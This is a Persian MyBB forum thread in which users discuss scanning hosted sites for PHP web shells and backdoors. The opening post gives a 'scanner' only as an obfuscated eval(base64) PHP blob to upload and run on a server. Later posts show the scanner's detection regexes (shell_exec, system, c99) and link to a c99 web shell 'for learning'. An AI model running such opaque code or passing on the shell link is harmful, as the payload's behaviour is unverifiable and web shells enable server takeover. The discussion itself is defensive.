هاست لینوکس

آخرین بسته‌ی MyBB: نسخه‌ی 1.8.27 MyBB منتشر شد
کتاب MyBB: کامل‌ترین کتاب راهنمای انجمن‌ساز MyBB از صفر تا صد منتشر شد

مرجع پارسی MyBB آرشیو آرشیو انجمن های قدیمی مای بی بی نسخه 1.6 آموزش ها امنیت
چک کردن هاست از نظر shell،کد مخرب و backdoors

امتیاز موضوع:
  • 0 رأی - میانگین امتیازات: 0
  • 1
  • 2
  • 3
  • 4
  • 5
حالت موضوعی
چک کردن هاست از نظر shell،کد مخرب و backdoors
lab آفلاین
سئوکار
*****
پاسخگو
ارسال‌ها: 560 موضوع‌ها: 30 تاریخ عضویت: ۱۳ ارديبهشت ۱۳۹۱ اعتبار: 28
#1
۱۳۹۱/۶/۶، ۰۵:۳۱:۳۸ صبح (آخرین ویرایش: ۱۳۹۱/۶/۶، ۰۵:۳۵:۲۴ صبح، توسط lab.)
این ترس همیشه وجود داشته که نکنه ما تو فایل هامون کسی shell اپلود کرده باشه و یا چطور از backdoor و injection code اگاه بشیم.
با این اسکریپت میتونین تا حدی هوشیار بمونینIdea مخصوصا کسانی که دائما میگن هک میشیم و دلیلشم نمیدونن

این کد ها رو تو notepad کپی کرده و با هر اسمی البته با پسوند php. اون رو save کنین و در هر جایی از سایتتون مثلا تو روت اپلودش کنین
حالا اون ادرس رو اجرا کنین(مثلا http://yoursite.com/scan.php)
فایل های مشکوک،یا الوده،shell و backdoor و کدهای مخرب رو در حد خودش بهتون نشون میده

اینکد شده:
کد php:
<? eval(gzinflate(base64_decode('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'))); ?>

نمونه این اسکنر
اسکنر

یا فایل زیر رو دانلود و تو روت سایتتون بریزین و اجراش کنین


فایل‌(های) پیوست شده
.php   scan.php (اندازه: 5.22 KB / تعداد دفعات دریافت: 50)
مرجع خبری سرگرمی علمی پزشکی

وب سایت ارسال‌ها
پاسخ
 سپاس شده توسطdarya1012 (۱۳۹۱/۶/۱۵، ۱۰:۳۶:۴۱ صبح) ، geo (۱۳۹۱/۶/۱۵، ۱۷:۴۴:۱۵ عصر) ، Doodoo (۱۳۹۱/۷/۳، ۱۹:۲۳:۱۴ عصر) ، salehkhan (۱۳۹۱/۷/۱۶، ۱۶:۰۲:۲۶ عصر) ، Amin IB (۱۳۹۱/۹/۱۹، ۲۱:۱۹:۳۷ عصر) ، quester (۱۳۹۲/۳/۲۶، ۱۰:۱۲:۰۲ صبح) ، firstboy000 (۱۳۹۳/۱/۱۵، ۱۵:۲۹:۲۳ عصر) ، MohamadReza (۱۳۹۳/۴/۲۶، ۱۸:۲۷:۲۵ عصر) ، motorola30 (۱۳۹۳/۷/۸، ۱۰:۰۵:۳۶ صبح)
majid01 آفلاین
jake
****
کاربر سایت
ارسال‌ها: 520 موضوع‌ها: 44 تاریخ عضویت: ۱۰ مهر ۱۳۹۰ اعتبار: 24
#2
۱۳۹۱/۶/۷، ۱۵:۱۷:۴۹ عصر
میتونید با استفاده از یک اسکنر نظیر Acunetix Web هم انجام بدید این اسکنر تمامی باگ ها رو شناسائی میکنه فقط کمی باید صبور باشید چون چند ساعت طول میکشه
طراحی اختصاصی قالب
نمونه کار ها : my board , smile , my theme , my favorite , MYVB theme ,
و ترجمه قالب : Blue Gloss
و به زودی سایت فروش قالب ها مای بی بی
ارسال‌ها
پاسخ
 سپاس شده توسطlab (۱۳۹۱/۶/۷، ۱۶:۱۵:۵۶ عصر) ، darya1012 (۱۳۹۱/۶/۱۵، ۱۰:۳۶:۳۸ صبح) ، geo (۱۳۹۱/۶/۱۵، ۱۷:۴۴:۱۲ عصر) ، Doodoo (۱۳۹۱/۷/۳، ۱۹:۲۳:۲۰ عصر) ، firstboy000 (۱۳۹۳/۱/۱۵، ۱۵:۲۹:۲۷ عصر) ، motorola30 (۱۳۹۳/۷/۸، ۱۰:۰۵:۵۸ صبح)
lab آفلاین
سئوکار
*****
پاسخگو
ارسال‌ها: 560 موضوع‌ها: 30 تاریخ عضویت: ۱۳ ارديبهشت ۱۳۹۱ اعتبار: 28
#3
۱۳۹۱/۶/۷، ۱۶:۱۵:۱۱ عصر
(۱۳۹۱/۶/۷، ۱۵:۱۷:۴۹ عصر)majid01 نوشته است: میتونید با استفاده از یک اسکنر نظیر Acunetix Web هم انجام بدید این اسکنر تمامی باگ ها رو شناسائی میکنه فقط کمی باید صبور باشید چون چند ساعت طول میکشه

پر اینترنت اسکنرهای مختلفه دادا
این اسکنر تحت وبه،با اونی که میگین زمین تا اسمون فرق داره،این یه اسکریپه ساده هستش که به عنوان یکی از راه های افزایش امنیت سایت بسیار به درد بخوره،شما که همه جا به اسکنر کامپیوترتون دسترسی ندارین،این همیشه رو سایتتونه و میشه هر لحظه چک کرد،با سرعت و در نوع خودش برای سایتها بسیار مفیده(رو شل ها امتحانش کردم،خوب بود) و فکر کنم با حجمی که داره(چند کیلوبایت) برای بیشتر امنیتی کردن سایتتون یک گام جلوتر میرین،هر وقت هم دوست داشتی و وقتشو با اسکنر هایی همچون acunetix web سیاتتونو چک کنین(هیچ اسکنری تمام باگها رو شناسایی نمیکنهWink)
مرجع خبری سرگرمی علمی پزشکی

وب سایت ارسال‌ها
پاسخ
 سپاس شده توسطmajid01 (۱۳۹۱/۶/۷، ۱۶:۵۷:۰۴ عصر) ، darya1012 (۱۳۹۱/۶/۱۵، ۱۰:۳۶:۳۳ صبح) ، Doodoo (۱۳۹۱/۷/۳، ۱۹:۲۳:۳۸ عصر) ، oracle140 (۱۳۹۱/۱۲/۱۹، ۲۳:۱۳:۲۶ عصر) ، motorola30 (۱۳۹۳/۷/۸، ۱۰:۱۴:۳۹ صبح)
yasan100 آفلاین
تازه وارد
*
کاربر سایت
ارسال‌ها: 24 موضوع‌ها: 7 تاریخ عضویت: ۱۴ بهمن ۱۳۹۰ اعتبار: 1
#4
۱۳۹۱/۶/۱۵، ۰۷:۲۷:۲۸ صبح
سلام دوستان من فایل بالا رو اجرا کردم میشه بگین اینا چی هستن

/inc/3rdparty/diff/Diff/Engine/shell.php MATCHES REGEX: /shell_exec *\(/i
./inc/3rdparty/diff/Diff/Engine/shell.php MATCHES REGEX: /`.+`/
./inc/db_mysqli.php MATCHES REGEX: /`.+`/
./inc/config.php MATCHES REGEX: /system *\(/i
./inc/db_mysql.php MATCHES REGEX: /`.+`/
./inc/tasks/backupdb.php MATCHES REGEX: /`.+`/
./inc/plugins/regsecureq.php MATCHES REGEX: /`.+`/
./inc/plugins/goodbyespammer.php MATCHES REGEX: /c99/i
./admin/modules/tools/backupdb.php MATCHES REGEX: /`.+`/
./admin/modules/tools/system_health.php MATCHES REGEX: /`.+`/
انجمن تخصصي عمران و نقشه برداري
وب سایت ارسال‌ها
پاسخ
 سپاس شده توسطdarya1012 (۱۳۹۱/۶/۱۵، ۱۰:۳۶:۲۹ صبح) ، motorola30 (۱۳۹۳/۷/۸، ۱۰:۰۶:۰۹ صبح)
lab آفلاین
سئوکار
*****
پاسخگو
ارسال‌ها: 560 موضوع‌ها: 30 تاریخ عضویت: ۱۳ ارديبهشت ۱۳۹۱ اعتبار: 28
#5
۱۳۹۱/۶/۱۵، ۰۸:۳۸:۰۷ صبح
فایل هایی که بی ضرر هستند ولی به چند تا کدشون گیر داده
مرجع خبری سرگرمی علمی پزشکی

وب سایت ارسال‌ها
پاسخ
 سپاس شده توسطdarya1012 (۱۳۹۱/۶/۱۵، ۱۰:۳۶:۱۹ صبح) ، motorola30 (۱۳۹۳/۷/۸، ۱۰:۱۵:۲۴ صبح)
geo آفلاین
کاربر فعال
****
کاربر سایت
ارسال‌ها: 736 موضوع‌ها: 64 تاریخ عضویت: ۱۶ خرداد ۱۳۹۰ اعتبار: 25
#6
۱۳۹۱/۶/۱۵، ۱۷:۴۵:۲۵ عصر
سلام

لطفا در مورد اصطلاح shell بیشتر توضیح دهید.
وب سایت ارسال‌ها
پاسخ
 سپاس شده توسطmotorola30 (۱۳۹۳/۷/۸، ۱۰:۰۶:۱۵ صبح)
lab آفلاین
سئوکار
*****
پاسخگو
ارسال‌ها: 560 موضوع‌ها: 30 تاریخ عضویت: ۱۳ ارديبهشت ۱۳۹۱ اعتبار: 28
#7
۱۳۹۱/۶/۱۵، ۱۸:۱۲:۴۹ عصر
(۱۳۹۱/۶/۱۵، ۱۷:۴۵:۲۵ عصر)geo نوشته است: سلام

لطفا در مورد اصطلاح shell بیشتر توضیح دهید.

در اینجا منظور از شل،دسترسی از سرور هستش که معمولا با تزریق یا به نحوی با اجرای شل اسکریپت هایی انجام میشه و با استفاده از باگ هایی یا دسترسی یا ... این امکان وجود داره نمونه هایی از شل ها مثل c99 و ...
مرجع خبری سرگرمی علمی پزشکی

وب سایت ارسال‌ها
پاسخ
 سپاس شده توسطgeo (۱۳۹۱/۶/۱۷، ۱۴:۴۴:۲۸ عصر) ، motorola30 (۱۳۹۳/۷/۸، ۱۰:۱۵:۳۴ صبح)
hamidkag آفلاین
مدیر سایت وفا دانلود
محروم
ارسال‌ها: 308 موضوع‌ها: 26 تاریخ عضویت: ۴ شهريور ۱۳۹۱
#8
Exclamation  ۱۳۹۱/۶/۱۷، ۰۷:۱۱:۵۸ صبح
دوستان و مدیران و برادران گرامی....لطفا بگید چگونه میشه با روش هک این سایت مبارزه کرد:

http://www.persiandb.net/tag/%D9%87%DA%A...D9%86-mybb

آموزشش رو گذاشته که چطوری شل گیری بشه....لطفا روش مبارزه با این روش رو بگید
ممنونConfusedIdea
ارسال‌ها
پاسخ
 سپاس شده توسطmotorola30 (۱۳۹۳/۷/۸، ۱۰:۱۵:۴۷ صبح)
Amin IB آفلاین
تخصص DDOS Protection
***
کاربر سایت
ارسال‌ها: 58 موضوع‌ها: 3 تاریخ عضویت: ۸ بهمن ۱۳۹۰ اعتبار: 0
#9
۱۳۹۱/۶/۳۱، ۲۳:۵۳:۲۰ عصر (آخرین ویرایش: ۱۳۹۱/۹/۱۹، ۲۱:۱۷:۲۸ عصر، توسط Amin IB.)
دوست عزیز hamidkag من فایلش رو دانلود کردم فایلش مشکوکه که ویروس یا تروجان باشه اگه تست کردی بگو ببینیم باگه درستش کنیم

در مورد شل واسه تازه کار ها بگم معمولا یک کد php هست که هم می تونه مستقل کار کنه هم می تونه تو انواع قالب ها و... غیره تزریق بشه وقتی صفحه ای که شل داره اجرا میشه شل باهاش اجرا میشه و نسبت به امکاناتی که شل مورد نظر داره هکر می تونه تو هاست و سیستم دستکاری کنه معمولا کسانی که خیلی حرفه ای هستند shell می نویسند و پولی می فروشند سرور اگه امنیتش بالا باشه و آپدیت شده باشه معمولا جلو اجرای شل های رایج رو میگیره ولی تضمینی نیست بتونه جلوی همه شل ها رو بگیره !میشه دسترسی شل ها رو از سرور کم کرد مثلا دسترسی php رو به چند قسمت مهم سرور می بندن شل هم که با php کار می کنه نمی تونه دسترسی داشته باشه البته من اطلاعاتم در مورد سرور لینوکس هستش ویندوز کار نکردم

بهترین سطح دسترسی برای جلو گیری از اجرا و گسترش محیطی که شل تو هاست می تونه تغییر بده برای فولدر ها 755 و برای فایل ها 644 البته 100% نیست ولی کار هکرو سخت می کنه




اینم لینک یک شل تستی برای یاد گیری خوبه مواظب باشید شاید لینک آلوده باشه و کوکی ها رو بدزده من که باز کردم Big Grin
ف*یل$تر شده قبلا نبود
http://corz.org/corz/c99.php

این توضیح برای تازه کار ها خوبه که نمی دونن شل چیه و چه خطری داره برای سایت !بهترین راهبرای دفاع از سایت بستن راه هایی هست که هکر برای تزریق شل استفاده می کنه

تا اونجا که من می دونم SQL injection تو مای بی بی واسه هک بهتر جواب میده که کسی خواست می تونم جلوی 95% این حملات رو براش بگیرم با تست البته با هزینه Smile که اگه باگی هم باشه هکر نتونه استفاده کنه و انجمن براحتی هک نشه!
F a r s i C h a t . Co
ارسال‌ها
پاسخ
 سپاس شده توسطDoodoo (۱۳۹۱/۷/۳، ۱۹:۲۴:۵۷ عصر)
lab آفلاین
سئوکار
*****
پاسخگو
ارسال‌ها: 560 موضوع‌ها: 30 تاریخ عضویت: ۱۳ ارديبهشت ۱۳۹۱ اعتبار: 28
#10
۱۳۹۱/۷/۱، ۰۵:۰۷:۴۱ صبح
فایل مشکوکه؟اینکد شدست این فایل،اگه خواستی بگو دکدشو بهت بدم.انتی ویروس های pc بعضی هاشون شاید گیر بدن البته من خودم ندیدم که گیری باشه.
میخواین چند تا شل بهتون بدم تست کنین روش؟
من رو سایت خودم و چند تا سایت دیگه نصبش کردم،گهگاهی انتی ویروس های هاست ها لنگ میزنن این اسکریپت میتونه کمکی باشه.هر چقدر امنیت بالاتر باشه بهتره.
مرجع خبری سرگرمی علمی پزشکی

وب سایت ارسال‌ها
پاسخ
 سپاس شده توسطAmin IB (۱۳۹۱/۷/۳، ۰۷:۵۷:۳۱ صبح)


پرش به انجمن:


کاربرانِ درحال بازدید از این موضوع: 1 مهمان